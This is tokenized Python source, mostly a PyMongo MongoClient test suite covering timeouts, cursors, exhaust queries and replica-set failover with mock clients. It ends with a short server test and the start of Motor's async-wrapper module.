send ( True ) <EOL> parent_pipe , child_pipe = multiprocessing . Pipe ( ) <EOL> p = multiprocessing . Process ( target = f , args = ( child_pipe , ) ) <EOL> p . start ( ) <EOL> p . join ( <NUM_LIT:10> ) <EOL> child_pipe . close ( ) <EOL> try : <EOL> parent_pipe . recv ( ) <EOL> self . fail ( ) <EOL> except EOFError : <EOL> pass <EOL> def test_document_class ( self ) : <EOL> c = self . client <EOL> db = c . pymongo_test <EOL> db . test . insert_one ( { "<STR_LIT:x>" : <NUM_LIT:1> } ) <EOL> self . assertEqual ( dict , c . codec_options . document_class ) <EOL> self . assertTrue ( isinstance ( db . test . find_one ( ) , dict ) ) <EOL> self . assertFalse ( isinstance ( db . test . find_one ( ) , SON ) ) <EOL> c = rs_or_single_client ( document_class = SON ) <EOL> db = c . pymongo_test <EOL> self . assertEqual ( SON , c . codec_options . document_class ) <EOL> self . assertTrue ( isinstance ( db . test . find_one ( ) , SON ) ) <EOL> def test_timeouts ( self ) : <EOL> client = rs_or_single_client ( connectTimeoutMS = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , get_pool ( client ) . opts . connect_timeout ) <EOL> client = rs_or_single_client ( socketTimeoutMS = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , get_pool ( client ) . opts . socket_timeout ) <EOL> def test_socket_timeout_ms_validation ( self ) : <EOL> c = rs_or_single_client ( socketTimeoutMS = <NUM_LIT:10> * <NUM_LIT:1000> ) <EOL> self . assertEqual ( <NUM_LIT:10> , get_pool ( c ) . opts . socket_timeout ) <EOL> c = connected ( rs_or_single_client ( socketTimeoutMS = None ) ) <EOL> self . assertEqual ( None , get_pool ( c ) . opts . socket_timeout ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = <NUM_LIT:0> ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = - <NUM_LIT:1> ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = <NUM_LIT> ) <EOL> self . 
assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = '<STR_LIT:foo>' ) <EOL> def test_socket_timeout ( self ) : <EOL> no_timeout = self . client <EOL> timeout_sec = <NUM_LIT:1> <EOL> timeout = rs_or_single_client ( socketTimeoutMS = <NUM_LIT:1000> * timeout_sec ) <EOL> no_timeout . pymongo_test . drop_collection ( "<STR_LIT:test>" ) <EOL> no_timeout . pymongo_test . test . insert_one ( { "<STR_LIT:x>" : <NUM_LIT:1> } ) <EOL> where_func = delay ( timeout_sec + <NUM_LIT:1> ) <EOL> def get_x ( db ) : <EOL> doc = next ( db . test . find ( ) . where ( where_func ) ) <EOL> return doc [ "<STR_LIT:x>" ] <EOL> self . assertEqual ( <NUM_LIT:1> , get_x ( no_timeout . pymongo_test ) ) <EOL> self . assertRaises ( NetworkTimeout , get_x , timeout . pymongo_test ) <EOL> def test_server_selection_timeout ( self ) : <EOL> client = MongoClient ( serverSelectionTimeoutMS = <NUM_LIT:100> , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0.1> , client . server_selection_timeout ) <EOL> client = MongoClient ( serverSelectionTimeoutMS = <NUM_LIT:0> , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0> , client . server_selection_timeout ) <EOL> self . assertRaises ( ValueError , MongoClient , <EOL> serverSelectionTimeoutMS = "<STR_LIT:foo>" , connect = False ) <EOL> self . assertRaises ( ValueError , MongoClient , <EOL> serverSelectionTimeoutMS = - <NUM_LIT:1> , connect = False ) <EOL> self . assertRaises ( ConfigurationError , MongoClient , <EOL> serverSelectionTimeoutMS = None , connect = False ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0.1> , client . server_selection_timeout ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0> , client . server_selection_timeout ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:30> , client . 
server_selection_timeout ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:30> , client . server_selection_timeout ) <EOL> def test_waitQueueTimeoutMS ( self ) : <EOL> client = rs_or_single_client ( waitQueueTimeoutMS = <NUM_LIT> ) <EOL> self . assertEqual ( get_pool ( client ) . opts . wait_queue_timeout , <NUM_LIT:2> ) <EOL> def test_waitQueueMultiple ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:3> , waitQueueMultiple = <NUM_LIT:2> ) <EOL> pool = get_pool ( client ) <EOL> self . assertEqual ( pool . opts . wait_queue_multiple , <NUM_LIT:2> ) <EOL> self . assertEqual ( pool . _socket_semaphore . waiter_semaphore . counter , <NUM_LIT:6> ) <EOL> def test_socketKeepAlive ( self ) : <EOL> client = rs_or_single_client ( socketKeepAlive = True ) <EOL> self . assertTrue ( get_pool ( client ) . opts . socket_keepalive ) <EOL> def test_tz_aware ( self ) : <EOL> self . assertRaises ( ValueError , MongoClient , tz_aware = '<STR_LIT:foo>' ) <EOL> aware = rs_or_single_client ( tz_aware = True ) <EOL> naive = self . client <EOL> aware . pymongo_test . drop_collection ( "<STR_LIT:test>" ) <EOL> now = datetime . datetime . utcnow ( ) <EOL> aware . pymongo_test . test . insert_one ( { "<STR_LIT:x>" : now } ) <EOL> self . assertEqual ( None , naive . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] . tzinfo ) <EOL> self . assertEqual ( utc , aware . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] . tzinfo ) <EOL> self . assertEqual ( <EOL> aware . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] . replace ( tzinfo = None ) , <EOL> naive . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] ) <EOL> @ client_context . require_ipv6 <EOL> def test_ipv6 ( self ) : <EOL> if client_context . auth_enabled : <EOL> auth_str = "<STR_LIT>" % ( db_user , db_pwd ) <EOL> else : <EOL> auth_str = "<STR_LIT>" <EOL> uri = "<STR_LIT>" % ( auth_str , port ) <EOL> if client_context . 
is_rs : <EOL> uri += '<STR_LIT>' + client_context . replica_set_name <EOL> client = rs_or_single_client_noauth ( uri ) <EOL> client . pymongo_test . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> client . pymongo_test_bernie . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> dbs = client . database_names ( ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> @ client_context . require_no_mongos <EOL> def test_fsync_lock_unlock ( self ) : <EOL> if ( server_is_master_with_slave ( client_context . client ) and <EOL> client_context . version . at_least ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( self . client . is_locked ) <EOL> if sys . platform not in ( '<STR_LIT>' , '<STR_LIT:win32>' ) : <EOL> self . client . fsync ( async = True ) <EOL> self . assertFalse ( self . client . is_locked ) <EOL> self . client . fsync ( lock = True ) <EOL> self . assertTrue ( self . client . is_locked ) <EOL> locked = True <EOL> self . client . unlock ( ) <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> locked = self . client . is_locked <EOL> if not locked : <EOL> break <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . assertFalse ( locked ) <EOL> def test_contextlib ( self ) : <EOL> client = rs_or_single_client ( ) <EOL> client . pymongo_test . drop_collection ( "<STR_LIT:test>" ) <EOL> client . pymongo_test . test . insert_one ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( get_pool ( client ) . sockets ) ) <EOL> with contextlib . closing ( client ) : <EOL> self . assertEqual ( "<STR_LIT:bar>" , client . pymongo_test . test . find_one ( ) [ "<STR_LIT:foo>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( get_pool ( client ) . sockets ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( get_pool ( client ) . sockets ) ) <EOL> with client as client : <EOL> self . 
assertEqual ( "<STR_LIT:bar>" , client . pymongo_test . test . find_one ( ) [ "<STR_LIT:foo>" ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( get_pool ( client ) . sockets ) ) <EOL> def test_interrupt_signal ( self ) : <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> db = self . client . pymongo_test <EOL> where = delay ( <NUM_LIT> ) <EOL> db . drop_collection ( '<STR_LIT:foo>' ) <EOL> db . foo . insert_one ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> def interrupter ( ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> thread . interrupt_main ( ) <EOL> thread . start_new_thread ( interrupter , ( ) ) <EOL> raised = False <EOL> try : <EOL> next ( db . foo . find ( { '<STR_LIT>' : where } ) ) <EOL> except KeyboardInterrupt : <EOL> raised = True <EOL> self . assertTrue ( raised , "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , <EOL> next ( db . foo . find ( ) ) <EOL> ) <EOL> def test_operation_failure ( self ) : <EOL> pool = get_pool ( self . client ) <EOL> socket_count = len ( pool . sockets ) <EOL> self . assertGreaterEqual ( socket_count , <NUM_LIT:1> ) <EOL> old_sock_info = next ( iter ( pool . sockets ) ) <EOL> self . client . pymongo_test . test . drop ( ) <EOL> self . client . pymongo_test . test . insert_one ( { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> self . assertRaises ( <EOL> OperationFailure , <EOL> self . client . pymongo_test . test . insert_one , { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> self . assertEqual ( socket_count , len ( pool . sockets ) ) <EOL> new_sock_info = next ( iter ( pool . sockets ) ) <EOL> self . assertEqual ( old_sock_info , new_sock_info ) <EOL> def test_kill_cursors_with_cursoraddress ( self ) : <EOL> if ( client_context . is_mongos <EOL> and not client_context . version . at_least ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> self . collection = self . client . pymongo_test . test <EOL> self . collection . 
drop ( ) <EOL> self . collection . insert_many ( [ { '<STR_LIT>' : i } for i in range ( <NUM_LIT:200> ) ] ) <EOL> cursor = self . collection . find ( ) . batch_size ( <NUM_LIT:1> ) <EOL> next ( cursor ) <EOL> self . client . kill_cursors ( <EOL> [ cursor . cursor_id ] , <EOL> _CursorAddress ( self . client . address , self . collection . full_name ) ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def raises_cursor_not_found ( ) : <EOL> try : <EOL> next ( cursor ) <EOL> return False <EOL> except CursorNotFound : <EOL> return True <EOL> wait_until ( raises_cursor_not_found , '<STR_LIT>' ) <EOL> def test_kill_cursors_with_tuple ( self ) : <EOL> if ( client_context . is_mongos <EOL> and not client_context . version . at_least ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> self . collection = self . client . pymongo_test . test <EOL> self . collection . drop ( ) <EOL> self . collection . insert_many ( [ { '<STR_LIT>' : i } for i in range ( <NUM_LIT:200> ) ] ) <EOL> cursor = self . collection . find ( ) . batch_size ( <NUM_LIT:1> ) <EOL> next ( cursor ) <EOL> self . client . kill_cursors ( <EOL> [ cursor . cursor_id ] , <EOL> self . client . address ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def raises_cursor_not_found ( ) : <EOL> try : <EOL> next ( cursor ) <EOL> return False <EOL> except CursorNotFound : <EOL> return True <EOL> wait_until ( raises_cursor_not_found , '<STR_LIT>' ) <EOL> def test_kill_cursors_with_server_unavailable ( self ) : <EOL> with client_knobs ( kill_cursor_frequency = <NUM_LIT> ) : <EOL> client = MongoClient ( '<STR_LIT>' , connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT:0> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> client . close_cursor ( <NUM_LIT> , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> with warnings . catch_warnings ( record = True ) as user_warnings : <EOL> client . _process_kill_cursors_queue ( ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( user_warnings [ <NUM_LIT:0> ] . 
message ) ) <EOL> def test_lazy_connect_w0 ( self ) : <EOL> client = rs_or_single_client ( connect = False , w = <NUM_LIT:0> ) <EOL> client . test_lazy_connect_w0 . test . insert_one ( { } ) <EOL> client = rs_or_single_client ( connect = False ) <EOL> client . test_lazy_connect_w0 . test . update_one ( { } , { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:1> } } ) <EOL> client = rs_or_single_client ( connect = False ) <EOL> client . test_lazy_connect_w0 . test . delete_one ( { } ) <EOL> @ client_context . require_no_mongos <EOL> def test_exhaust_network_error ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) <EOL> collection = client . pymongo_test . test <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> connected ( client ) <EOL> sock_info = one ( pool . sockets ) <EOL> sock_info . sock . close ( ) <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> with self . assertRaises ( ConnectionFailure ) : <EOL> next ( cursor ) <EOL> self . assertTrue ( sock_info . closed ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> @ client_context . require_auth <EOL> def test_auth_network_error ( self ) : <EOL> c = connected ( rs_or_single_client ( maxPoolSize = <NUM_LIT:1> , <EOL> waitQueueTimeoutMS = <NUM_LIT:1> ) ) <EOL> credentials = auth . _build_credentials_tuple ( <EOL> '<STR_LIT>' , '<STR_LIT>' , db_user , db_pwd , { } ) <EOL> c . _cache_credentials ( '<STR_LIT:test>' , credentials , connect = False ) <EOL> pool = get_pool ( c ) <EOL> socket_info = one ( pool . sockets ) <EOL> socket_info . sock . close ( ) <EOL> self . assertRaises ( AutoReconnect , c . test . collection . find_one ) <EOL> c . test . collection . find_one ( ) <EOL> @ client_context . 
require_no_replica_set <EOL> def test_connect_to_standalone_using_replica_set_name ( self ) : <EOL> client = MongoClient ( pair , replicaSet = '<STR_LIT>' , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> ) <EOL> with self . assertRaises ( AutoReconnect ) : <EOL> client . test . test . find_one ( ) <EOL> @ client_context . require_replica_set <EOL> def test_stale_getmore ( self ) : <EOL> with self . assertRaises ( AutoReconnect ) : <EOL> client = MongoClient ( host , port , connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> , <EOL> replicaSet = client_context . replica_set_name ) <EOL> client . _send_message_with_response ( <EOL> operation = message . _GetMore ( '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , <NUM_LIT> , client . codec_options ) , <EOL> address = ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> class TestExhaustCursor ( IntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestExhaustCursor , self ) . setUp ( ) <EOL> if client_context . is_mongos : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> @ client_context . require_version_min ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> def test_exhaust_query_server_error ( self ) : <EOL> client = connected ( rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) ) <EOL> collection = client . pymongo_test . test <EOL> pool = get_pool ( client ) <EOL> sock_info = one ( pool . sockets ) <EOL> cursor = collection . find ( <EOL> SON ( [ ( '<STR_LIT>' , { } ) , ( '<STR_LIT>' , True ) ] ) , <EOL> cursor_type = CursorType . EXHAUST ) <EOL> self . assertRaises ( OperationFailure , cursor . next ) <EOL> self . assertFalse ( sock_info . closed ) <EOL> self . assertIn ( sock_info , pool . sockets ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> def test_exhaust_getmore_server_error ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) <EOL> collection = client . pymongo_test . test <EOL> collection . drop ( ) <EOL> collection . 
insert_many ( [ { } for _ in range ( <NUM_LIT:200> ) ] ) <EOL> self . addCleanup ( client_context . client . pymongo_test . test . drop ) <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> sock_info = one ( pool . sockets ) <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> cursor . next ( ) <EOL> def receive_message ( operation , request_id ) : <EOL> SocketInfo . receive_message ( sock_info , operation , request_id ) <EOL> msg = struct . pack ( '<STR_LIT>' , <NUM_LIT:1> << <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> msg += BSON . encode ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:code>' : <NUM_LIT:0> } ) <EOL> return msg <EOL> saved = sock_info . receive_message <EOL> sock_info . receive_message = receive_message <EOL> self . assertRaises ( OperationFailure , list , cursor ) <EOL> sock_info . receive_message = saved <EOL> self . assertEqual ( <NUM_LIT:200> , collection . count ( ) ) <EOL> self . assertIn ( sock_info , pool . sockets ) <EOL> def test_exhaust_query_network_error ( self ) : <EOL> client = connected ( rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) ) <EOL> collection = client . pymongo_test . test <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> sock_info = one ( pool . sockets ) <EOL> sock_info . sock . close ( ) <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> self . assertRaises ( ConnectionFailure , cursor . next ) <EOL> self . assertTrue ( sock_info . closed ) <EOL> self . assertNotIn ( sock_info , pool . sockets ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> def test_exhaust_getmore_network_error ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) <EOL> collection = client . pymongo_test . test <EOL> collection . drop ( ) <EOL> collection . 
insert_many ( [ { } for _ in range ( <NUM_LIT:200> ) ] ) <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> cursor . next ( ) <EOL> sock_info = cursor . _Cursor__exhaust_mgr . sock <EOL> sock_info . sock . close ( ) <EOL> self . assertRaises ( ConnectionFailure , list , cursor ) <EOL> self . assertTrue ( sock_info . closed ) <EOL> self . assertNotIn ( sock_info , pool . sockets ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> class TestClientLazyConnect ( IntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def _get_client ( self ) : <EOL> return rs_or_single_client ( connect = False ) <EOL> def test_insert_one ( self ) : <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> def insert_one ( collection , _ ) : <EOL> collection . insert_one ( { } ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( NTHREADS , collection . count ( ) ) <EOL> lazy_client_trial ( reset , insert_one , test , self . _get_client ) <EOL> def test_update_one ( self ) : <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> collection . insert_one ( { '<STR_LIT:i>' : <NUM_LIT:0> } ) <EOL> def update_one ( collection , _ ) : <EOL> collection . update_one ( { } , { '<STR_LIT>' : { '<STR_LIT:i>' : <NUM_LIT:1> } } ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( NTHREADS , collection . find_one ( ) [ '<STR_LIT:i>' ] ) <EOL> lazy_client_trial ( reset , update_one , test , self . _get_client ) <EOL> def test_delete_one ( self ) : <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> collection . insert_many ( [ { '<STR_LIT:i>' : i } for i in range ( NTHREADS ) ] ) <EOL> def delete_one ( collection , i ) : <EOL> collection . delete_one ( { '<STR_LIT:i>' : i } ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( <NUM_LIT:0> , collection . 
count ( ) ) <EOL> lazy_client_trial ( reset , delete_one , test , self . _get_client ) <EOL> def test_find_one ( self ) : <EOL> results = [ ] <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> collection . insert_one ( { } ) <EOL> results [ : ] = [ ] <EOL> def find_one ( collection , _ ) : <EOL> results . append ( collection . find_one ( ) ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( NTHREADS , len ( results ) ) <EOL> lazy_client_trial ( reset , find_one , test , self . _get_client ) <EOL> def test_max_bson_size ( self ) : <EOL> c = self . _get_client ( ) <EOL> ismaster = c . db . command ( '<STR_LIT>' ) <EOL> self . assertEqual ( ismaster [ '<STR_LIT>' ] , c . max_bson_size ) <EOL> if '<STR_LIT>' in ismaster : <EOL> self . assertEqual ( <EOL> ismaster [ '<STR_LIT>' ] , <EOL> c . max_message_size ) <EOL> class TestMongoClientFailover ( MockClientTest ) : <EOL> def test_discover_primary ( self ) : <EOL> with client_knobs ( heartbeat_frequency = <NUM_LIT> ) : <EOL> c = MockClient ( <EOL> standalones = [ ] , <EOL> members = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> mongoses = [ ] , <EOL> host = '<STR_LIT>' , <EOL> replicaSet = '<STR_LIT>' ) <EOL> wait_until ( lambda : len ( c . nodes ) == <NUM_LIT:3> , '<STR_LIT>' ) <EOL> self . assertEqual ( c . address , ( '<STR_LIT:a>' , <NUM_LIT:1> ) ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> c . mock_primary = '<STR_LIT>' <EOL> c . close ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( c . nodes ) ) <EOL> t = c . _get_topology ( ) <EOL> t . select_servers ( writable_server_selector ) <EOL> self . assertEqual ( c . address , ( '<STR_LIT:b>' , <NUM_LIT:2> ) ) <EOL> self . assertLess ( len ( c . nodes ) , <NUM_LIT:3> ) <EOL> t . 
select_server_by_address ( ( '<STR_LIT:c>' , <NUM_LIT:3> ) ) <EOL> def test_reconnect ( self ) : <EOL> c = MockClient ( <EOL> standalones = [ ] , <EOL> members = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> mongoses = [ ] , <EOL> host = '<STR_LIT>' , <EOL> replicaSet = '<STR_LIT>' ) <EOL> wait_until ( lambda : len ( c . nodes ) == <NUM_LIT:3> , '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> self . assertRaises ( AutoReconnect , c . db . collection . find_one ) <EOL> c . revive_host ( '<STR_LIT>' ) <EOL> c . _get_topology ( ) . select_servers ( writable_server_selector ) <EOL> self . assertEqual ( c . address , ( '<STR_LIT:a>' , <NUM_LIT:1> ) ) <EOL> def _test_network_error ( self , operation_callback ) : <EOL> with client_knobs ( heartbeat_frequency = <NUM_LIT> ) : <EOL> c = MockClient ( <EOL> standalones = [ ] , <EOL> members = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> mongoses = [ ] , <EOL> host = '<STR_LIT>' , <EOL> replicaSet = '<STR_LIT>' , <EOL> connect = False ) <EOL> c . set_wire_version_range ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> c . set_wire_version_range ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> c . _get_topology ( ) . select_servers ( writable_server_selector ) <EOL> wait_until ( lambda : len ( c . nodes ) == <NUM_LIT:2> , '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> self . assertRaises ( AutoReconnect , operation_callback , c ) <EOL> server_a = c . _get_topology ( ) . get_server_by_address ( ( '<STR_LIT:a>' , <NUM_LIT:1> ) ) <EOL> sd_a = server_a . description <EOL> self . assertEqual ( SERVER_TYPE . Unknown , sd_a . server_type ) <EOL> self . assertEqual ( <NUM_LIT:0> , sd_a . min_wire_version ) <EOL> self . assertEqual ( <NUM_LIT:0> , sd_a . max_wire_version ) <EOL> server_b = c . _get_topology ( ) . get_server_by_address ( ( '<STR_LIT:b>' , <NUM_LIT:2> ) ) <EOL> sd_b = server_b . description <EOL> self . assertEqual ( SERVER_TYPE . 
RSSecondary , sd_b . server_type ) <EOL> self . assertEqual ( <NUM_LIT:0> , sd_b . min_wire_version ) <EOL> self . assertEqual ( <NUM_LIT:2> , sd_b . max_wire_version ) <EOL> def test_network_error_on_query ( self ) : <EOL> callback = lambda client : client . db . collection . find_one ( ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_insert ( self ) : <EOL> callback = lambda client : client . db . collection . insert_one ( { } ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_update ( self ) : <EOL> callback = lambda client : client . db . collection . update_one ( <EOL> { } , { '<STR_LIT>' : '<STR_LIT:x>' } ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_replace ( self ) : <EOL> callback = lambda client : client . db . collection . replace_one ( { } , { } ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_delete ( self ) : <EOL> callback = lambda client : client . db . collection . delete_many ( { } ) <EOL> self . _test_network_error ( callback ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ "<STR_LIT>" ] <EOL> from pymongo . ismaster import IsMaster <EOL> from pymongo . server import Server <EOL> from pymongo . server_description import ServerDescription <EOL> from test import unittest <EOL> class TestServer ( unittest . TestCase ) : <EOL> def test_repr ( self ) : <EOL> ismaster = IsMaster ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> sd = ServerDescription ( ( '<STR_LIT:localhost>' , <NUM_LIT> ) , ismaster ) <EOL> server = Server ( sd , pool = object ( ) , monitor = object ( ) ) <EOL> self . assertTrue ( '<STR_LIT>' in str ( server ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __future__ import unicode_literals , absolute_import <EOL> """<STR_LIT>""" <EOL> import inspect <EOL> import functools <EOL> import greenlet <EOL> from pymongo . cursor import Cursor <EOL> from . import motor_py3_compat <EOL> from . motor_common import ( callback_type_error , <EOL> check_deprecated_kwargs , <EOL> mangle_delegate_name ) <EOL> _class_cache = { } <EOL> def asynchronize ( <EOL> motor_class , <EOL> framework , <EOL> sync_method , <EOL> has_write_concern , <EOL> doc = None ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( sync_method ) <EOL> def method ( self , * args , ** kwargs ) : <EOL> check_deprecated_kwargs ( kwargs ) <EOL> loop = self . get_io_loop ( ) <EOL> callback = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if callback : <EOL> if not callable ( callback ) : <EOL> raise callback_type_error <EOL> future = None <EOL> else : <EOL> future = framework . get_future ( self . get_io_loop ( ) ) <EOL> def call_method ( ) : <EOL> try : <EOL> result = sync_method ( self . delegate , * args , ** kwargs ) <EOL> if callback : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( callback , result , None ) ) <EOL> else : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( future . set_result , result ) ) <EOL> except Exception as e : <EOL> if callback : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( callback , None , e ) ) <EOL> else : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( future . set_exception , e ) ) <EOL> greenlet . greenlet ( call_method ) . switch ( ) <EOL> return future <EOL> method . is_async_method = True <EOL> method . has_write_concern = has_write_concern <EOL> name = sync_method . __name__ <EOL> method . pymongo_method_name = mangle_delegate_name ( motor_class , name ) <EOL> if doc is not None : <EOL> method . __doc__ = doc <EOL> return method <EOL> _coro_token = object ( ) <EOL> def motor_coroutine ( f ) : <EOL> """<STR_LIT>""" <EOL> f . 
_is_motor_coroutine = _coro_token <EOL> return f <EOL> def coroutine_annotation ( f ) : <EOL> """<STR_LIT>""" <EOL> f . coroutine_annotation = True <EOL> return f <EOL> class MotorAttributeFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , doc = None ) : <EOL> self . doc = doc <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> raise NotImplementedError <EOL> class Async ( MotorAttributeFactory ) : <EOL> def __init__ ( self , attr_name , has_write_concern , doc = None ) : <EOL> """<STR_LIT>""" <EOL> super ( Async , self ) . __init__ ( doc ) <EOL> self . attr_name = attr_name <EOL> self . has_write_concern = has_write_concern <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> name = mangle_delegate_name ( cls , self . attr_name or attr_name ) <EOL> method = getattr ( cls . __delegate_class__ , name ) <EOL> return asynchronize ( <EOL> motor_class = cls , <EOL> framework = cls . _framework , <EOL> sync_method = method , <EOL> has_write_concern = self . has_write_concern , <EOL> doc = self . doc ) <EOL> def wrap ( self , original_class ) : <EOL> return WrapAsync ( self , original_class ) <EOL> def unwrap ( self , class_name ) : <EOL> return Unwrap ( self , class_name ) <EOL> class WrapBase ( MotorAttributeFactory ) : <EOL> def __init__ ( self , prop , doc = None ) : <EOL> super ( WrapBase , self ) . __init__ ( doc ) <EOL> self . property = prop <EOL> class WrapAsync ( WrapBase ) : <EOL> def __init__ ( self , prop , original_class ) : <EOL> """<STR_LIT>""" <EOL> super ( WrapAsync , self ) . __init__ ( prop ) <EOL> self . original_class = original_class <EOL> def 